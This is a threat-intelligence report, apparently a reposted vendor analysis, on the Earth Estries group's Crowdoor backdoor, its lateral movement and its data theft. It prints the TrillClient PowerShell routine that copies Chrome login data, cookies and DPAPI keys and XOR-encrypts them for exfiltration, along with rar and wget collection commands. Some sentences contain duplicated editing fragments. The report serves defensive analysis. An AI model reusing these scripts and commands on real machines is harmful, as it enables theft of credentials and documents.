Breaking Down Earth Estries’ Persistent TTPs in Prolonged Cyber Operations
Crowdoor will perform different actions based on the corresponding argument. In table 1, we summarize the behaviors exhibited by the new Crowdoor variant based on the arguments used. Overall, the behaviors are similar to the ones seen in the older variant, with the difference being the injected process (msiexec.exe) and Command IDs (shown in table 2)
Arguments | Action |
---|---|
No argument | Persistence is set through the registry Run key or a service and the backdoor is restarted |
0 | Persistence is set through the registry Run key or a service and the backdoor is restarted. |
1 | The backdoor is restarted by injecting to ‘msiexec.exe’ |
2 | The backdoor main function is called |
Table 1. List of arguments and their corresponding actions
Old Crowdoor variant | New Crowdoor variant | Functions |
---|---|---|
0x2347135 | 0x11736212 | Initial connection C2 |
0x2347136 | 0x11736213 | Collect ComputerName,Username, OS version and hostnet or IP information |
0x2347137 | 0x11736214 | Remote shell |
0x234713B | 0x11736218 | Delete malware files, persistence and exit |
0x2347140 | 0x1173621D | File related Operation |
0x2347141 | 0x1173621E | Open/ReadFile |
0x2347142 | 0x1173621F | Open/WriteFile |
0x2347144 | 0x11736221 | Collect drive information |
0x2347145 | 0x11736222 | Search File |
0x2347148 | 0x11736225 | CreateDirectory |
0x2347149 | 0x11736226 | Rename file or directory |
0x234714A | 0x11736227 | Delete file or Directory |
0x234714A | 0x11736228 | Communication with C&C server |
Table 2. Comparison between old and new Crowdoor variants
Package 1 | Package 2 | Package 3 | Package 4 |
---|---|---|---|
WinStore.exe (Host) | K7Sysmon.exe (Host) | HxTsk.exe (Host) | MsMsRng.exe (Host) |
Sqlite3.dll | K7Sysmn1.dll | d3d8.dll | sqlite3.dll |
datastate.dll | K7Sysmn2.dll | HxTsk (encrypted) | msimg32.dll |
datast.dll | K7Sysmn3.dll | datastate.dll | |
WinStore (encrypted) | K7Sysmon.dll (encrypted) | MsMsRng (encrypted) |
Table 3. Crowdoor packages
Lateral Movement
Earth Estries uses PSExec to laterally install its backdoors and tools, notably by copying the CAB files containing the backdoors or tools, and a batch file to perform the installation, maintain persistence, and execute the tools.
Typically, PSExec is used to copy the CAB file containing the malware that will be laterally installed. However,in some instances, WMIC may be used in its place to achieve similar results. A set of batch files will then be copied and executed to perform the extraction, installation, and execution of the malware. Large scale collection may also be executed using batch files.
In later stages of the attack, the backdoors may be used directly to perform lateral movement. CAB files are still used as containers for the tools to be installed, and batch files are still incorporated in the extraction, installation and execution of said tools. This will sometimes include the creation of persistence mechanisms for the batch file to act as an indirect persistence mechanism for the actual backdoors.
Discovery, collection and exfiltration
TrillClient’s user credential discovery
Earth Estries will collect user credentials that can be used to further its objectives. The threat actor employs the TrillClient information stealer for this routine, primarily collecting user credentials from browser user profiles. TrillClient launches a PowerShelll script that will collect user profiles to be saved at a specific location:
foreach($win_user_path in $users_path){
echo D | xcopy \”C:\Users\$win_user_path\AppData\Roaming\Microsoft\Protect\” \”$copy_dest_path\$win_user_path\Protect\” /E /C /H;
attrib -a -s -r -h \”$copy_dest_path\$win_user_path\*\” /S /D;
echo F | xcopy \”C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Local State\” \”$copy_dest_path\$win_user_path\Local State\” /C;
echo F | xcopy \”C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies\” \”$copy_dest_path\$win_user_path\Default\Network\Cookies\” /C
echo F | xcopy \”C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Login Data\” \”$copy_dest_path\$win_user_path\Default\Login Data\” /C;
$profile_path = Get-ChildItem -Name \”C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\\\” -Include *Profile* -ErrorAction SilentlyContinue;
foreach($chrome_user_path in $profile_path){
echo F | xcopy \”C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\$chrome_user_path\Network\Cookies\” \”$copy_dest_path\$win_user_path\$chrome_user_path\Network\Cookies\” /C;
echo F | xcopy \“C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\$chrome_user_path\Login Data\” \”$copy_dest_path\$win_user_path\$chrome_user_path\Login Data\” /C;
}
}
Data will be collected from the following folders:
- %LOCALAPPDATA%\Google\Chrome\User Data\Local State
- %LOCALAPPDATA%\Google\Chrome\User Data\<PROFILE>\Login Data
- %LOCALAPPDATA%\Google\Chrome\User Data\<PROFILE>\Network\Cookies
- %APPDATA%\Microsoft\Protect\*
The collected data will be temporarily copied to <%TEMP%\browser_temp_data<RANDOM>>, archived using the tar command, and encrypted with an XOR algorithm.
tar -cvf \”$copy_dest_path\tar\” $copy_dest_path;
$e_a = [System.IO.File]::ReadAllBytes(\”$copy_dest_path\tar\”);Remove-Item -Path $copy_dest_path -Recurse;
$e_i = 0;foreach($e_c in $e_a){$e_a[$e_i] = (($e_c -bxor ($e_i % 252)) -bxor (0xe6 – ($e_i % 199)));$e_i += 1;
$random_filename = \”300775736611547784207972935122149919289871693\”;
$out_put_file = $out_put_path + \”\\\” + $random_filename;
echo $out_put_file;
[System.IO.File]::WriteAllBytes($out_put_file, $e_a);
The collected data will then be sent to the threat actor’s Gmail account over Simple Mail Transfer Protocol (SMTP).
Collection of sensitive documents
Earth Estries utilizes RAR for collecting information of interest. On this attack scenario, they utilize wget to download target documents from an internal web-based document management platform to a collection folder before archiving them.
- In this instance, a batch file containing commands to download PDF files to the collection directory is executed, containing hardcoded document names:
- c:\users\public\music\temp\wget.exe -c “hxxp://172.16.xx.xx/{document path}/{Hardcoded Filename}.pdf” -P c:\users\public\music\temp
- Afterwards, collected PDF’s are archived
- C:\Windows\system32\cmd.exe /C C:\Users\Public\Music\rar.exe a -m5 C:\Users\Public\Music\pdf0412.rar C:\Users\Public\Music\temp\*.pdf
Collection via backdoor
Earth Estries uses both Crowdoor and Cobalt Strike installations for collection routines by archiving information of interest both from both local and remote locations. Some examples of collection commands performed are as follows:
Example command | Functions |
---|---|
rar.exe a -m5 <install path>\322.rar \\<remote machine>\c$\<remote path> | Collect Gather information collected by an older generation of infection from a remote machine |
rar.exe a -m5 <install path> \his231.rar “C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\History” | Collect browser history files, which are of. Of interest to the attackers to be able to compromise more credentials |
rar.exe a <install path>\0311.rar C:\users\<user name>\Desktop\* C:\users\ <user name> \Downloads\* C:\users\ <user name> \Documents\* -r -y -ta<cutoff date> | Collection ofCollect more recent files and/or documents interacted with by a local user |
Table 4. Collection commands
Telemetry suggests that they were exfiltrated through the same methods that the collection command is executed: either through the command-and-control (C&C) channels of their backdoors, or through the same initial access method used to control these tools.
An overview of the second Earth Estries attack flow is shown in figure 3:
Read More HERE